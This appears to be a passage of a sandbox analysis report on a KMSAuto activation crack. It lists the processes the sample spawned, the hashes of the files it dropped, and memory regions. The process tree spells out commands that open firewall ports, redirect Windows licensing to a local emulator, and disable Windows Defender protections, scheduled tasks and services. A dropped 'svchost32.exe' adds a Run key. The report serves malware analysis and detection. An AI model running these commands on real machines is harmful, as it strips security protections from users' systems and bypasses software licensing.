C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=16884⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP3⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=16883⤵
-
C:\Windows\system32\netsh.exeNetsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=16884⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto3⤵
-
C:\Windows\system32\sc.exesc.exe create KMSEmulator binpath= temp.exe type= own start= auto4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator3⤵
-
C:\Windows\system32\sc.exesc.exe start KMSEmulator4⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:323⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:324⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:643⤵
-
C:\Windows\System32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:644⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:16883⤵
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:16884⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato3⤵
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato4⤵
-
C:\Windows\system32\slui.exe"C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C0033⤵
-
C:\Users\Admin\microsoft tap driver.exe"C:\Users\Admin\microsoft tap driver.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat "C:\Users\Admin\microsoft tap driver.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
-
C:\Users\Admin\svchost32.exe"C:\Users\Admin\svchost32.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe"C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP1⤵
- Executes dropped EXE
-
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe"C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.batFilesize
3KB
MD53a981c51aac5475414f6dea9f4e6ae1a
SHA190fb6d188c3a6a04f9294fabc71f62635f0c3ea6
SHA256f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809
SHA512a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b
-
C:\Users\Admin\AppData\Local\Temp\signtool.exeFilesize
323KB
MD505624e6d27eaef0db0673ae627bd6027
SHA1b155c76bf59992a8d75d0e3a59dc94f24aff2591
SHA256962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
SHA512233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
-
C:\Users\Admin\AppData\Local\Temp\slmgr.vbsFilesize
110KB
MD538482a5013d8ab40df0fb15eae022c57
SHA15a4a7f261307721656c11b5cc097cde1cf791073
SHA256ac5c46b97345465a96e9ae1edaff44b191a39bf3d03dc1128090b8ffa92a16f8
SHA51229c1348014ac448fb9c1a72bfd0ab16cdd62b628dc64827b02965b96ba851e9265c4426007181d2aa08f8fb7853142cc01fc6e4d89bec8fc25f3d340d3857331
-
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exeFilesize
33KB
MD5757a99654e7709aa3ef33056fc3dc8eb
SHA1d63430b034d1587793dcb5d738b8c3f612546118
SHA256ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817
SHA512517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04
-
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exeFilesize
33KB
MD5757a99654e7709aa3ef33056fc3dc8eb
SHA1d63430b034d1587793dcb5d738b8c3f612546118
SHA256ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817
SHA512517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04
-
C:\Users\Admin\KMSAuto_Files\bin\KMSSS.logFilesize
773B
MD58535c4bbb7167c46ba65262945fe5c28
SHA1311e55ffeaae1317c4cd83c9000f65082ae32c2d
SHA256fbcbb6f17371066eb9b44303070cc0b1b2100b77195d1c6baebdd15a47691fda
SHA5120285b927ad48960ef9581a3216475cdcef7d5df9807f294a247fc8dc75ee02c34ae927ddc02112befed9f22a75b3604b8ce416240b8d1e1f58d5b949b4299034
-
C:\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
C:\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
C:\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
C:\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
C:\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
SHA2564318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
SHA512080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
-
C:\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
\Users\Admin\AppData\Local\Temp\signtool.exeFilesize
323KB
MD505624e6d27eaef0db0673ae627bd6027
SHA1b155c76bf59992a8d75d0e3a59dc94f24aff2591
SHA256962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
SHA512233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
-
\Users\Admin\AppData\Local\Temp\signtool.exeFilesize
323KB
MD505624e6d27eaef0db0673ae627bd6027
SHA1b155c76bf59992a8d75d0e3a59dc94f24aff2591
SHA256962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
SHA512233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
-
\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
\Users\Admin\kms driver.exeFilesize
46KB
MD55f3f77593b1a5bc4e96257a38a8666b1
SHA1532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
SHA2561b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
SHA51259b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
-
\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
\Users\Admin\kmsauto++v1.6.4.exeFilesize
17.2MB
MD5f047284bfddc942292d93ed86fdb20fd
SHA156dc945674cf4f941cf17a9ac9c1c9718cf9d18e
SHA256793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
SHA5122ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
-
\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
SHA2564318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
SHA512080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
-
\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
SHA2564318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
SHA512080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
-
\Users\Admin\microsoft tap driver.exeFilesize
59KB
MD5e0b6a8a56069214d6dc31a2c053f73f7
SHA13eb13ab2e49014437c904f8ada2d22a85fd503e4
SHA2564318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
SHA512080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
-
\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
\Users\Admin\svchost32.exeFilesize
533KB
MD54ec113ac1f8e7d4dda1270cc8bb00efc
SHA17a33598cab86959e8a3001ef0a2a756514de3aed
SHA2567f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
SHA51228954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2
-
memory/296-131-0x0000000000000000-mapping.dmp
-
memory/316-115-0x0000000000000000-mapping.dmp
-
memory/396-118-0x0000000000000000-mapping.dmp
-
memory/480-109-0x0000000000000000-mapping.dmp
-
memory/520-66-0x0000000000000000-mapping.dmp
-
memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmpFilesize
19.1MB
-
memory/520-132-0x0000000073DC1000-0x0000000073DC3000-memory.dmpFilesize
8KB
-
memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmpFilesize
19.1MB
-
memory/544-111-0x0000000000000000-mapping.dmp
-
memory/636-165-0x0000000000000000-mapping.dmp
-
memory/652-145-0x0000000000000000-mapping.dmp
-
memory/776-161-0x0000000000000000-mapping.dmp
-
memory/844-142-0x0000000000000000-mapping.dmp
-
memory/892-129-0x0000000000000000-mapping.dmp
-
memory/896-148-0x0000000000000000-mapping.dmp
-
memory/928-125-0x0000000000000000-mapping.dmp
-
memory/928-95-0x0000000000000000-mapping.dmp
-
memory/928-141-0x0000000000000000-mapping.dmp
-
memory/956-121-0x0000000000000000-mapping.dmp
-
memory/972-112-0x0000000000000000-mapping.dmp
-
memory/980-124-0x0000000000000000-mapping.dmp
-
memory/984-157-0x0000000000000000-mapping.dmp
-
memory/1000-122-0x0000000000000000-mapping.dmp
-
memory/1020-99-0x0000000000000000-mapping.dmp
-
memory/1020-128-0x0000000000000000-mapping.dmp
-
memory/1048-151-0x0000000000000000-mapping.dmp
-
memory/1144-98-0x0000000000000000-mapping.dmp
-
memory/1156-103-0x0000000000000000-mapping.dmp
-
memory/1156-144-0x0000000000000000-mapping.dmp
-
memory/1184-162-0x0000000000000000-mapping.dmp
-
memory/1256-167-0x0000000000000000-mapping.dmp
-
memory/1276-150-0x0000000000000000-mapping.dmp
-
memory/1276-110-0x0000000000000000-mapping.dmp
-
memory/1284-130-0x0000000000000000-mapping.dmp
-
memory/1316-160-0x0000000000000000-mapping.dmp
-
memory/1380-153-0x0000000000000000-mapping.dmp
-
memory/1416-133-0x0000000000000000-mapping.dmp
-
memory/1416-108-0x0000000000000000-mapping.dmp
-
memory/1428-100-0x0000000000000000-mapping.dmp
-
memory/1516-114-0x0000000000000000-mapping.dmp
-
memory/1516-147-0x0000000000000000-mapping.dmp
-
memory/1532-137-0x0000000000000000-mapping.dmp
-
memory/1592-152-0x0000000000000000-mapping.dmp
-
memory/1596-74-0x0000000000000000-mapping.dmp
-
memory/1596-166-0x0000000000000000-mapping.dmp
-
memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/1632-156-0x0000000000000000-mapping.dmp
-
memory/1636-120-0x0000000000000000-mapping.dmp
-
memory/1652-158-0x0000000000000000-mapping.dmp
-
memory/1652-106-0x0000000000000000-mapping.dmp
-
memory/1736-80-0x0000000000000000-mapping.dmp
-
memory/1744-159-0x0000000000000000-mapping.dmp
-
memory/1760-123-0x0000000000000000-mapping.dmp
-
memory/1808-136-0x0000000000000000-mapping.dmp
-
memory/1808-116-0x0000000000000000-mapping.dmp
-
memory/1816-91-0x0000000000890000-0x00000000008FD000-memory.dmpFilesize
436KB
-
memory/1816-89-0x0000000000268000-0x00000000002CC000-memory.dmpFilesize
400KB
-
memory/1816-86-0x0000000000000000-mapping.dmp
-
memory/1816-92-0x0000000000400000-0x0000000000886000-memory.dmpFilesize
4.5MB
-
memory/1816-101-0x0000000000268000-0x00000000002CC000-memory.dmpFilesize
400KB
-
memory/1816-135-0x0000000000400000-0x0000000000886000-memory.dmpFilesize
4.5MB
-
memory/1880-59-0x0000000000000000-mapping.dmp
-
memory/1880-88-0x0000000000DC0000-0x0000000000DCE000-memory.dmpFilesize
56KB
-
memory/1888-119-0x0000000000000000-mapping.dmp
-
memory/1896-164-0x0000000000000000-mapping.dmp
-
memory/1896-126-0x0000000000000000-mapping.dmp
-
memory/1908-138-0x0000000000000000-mapping.dmp
-
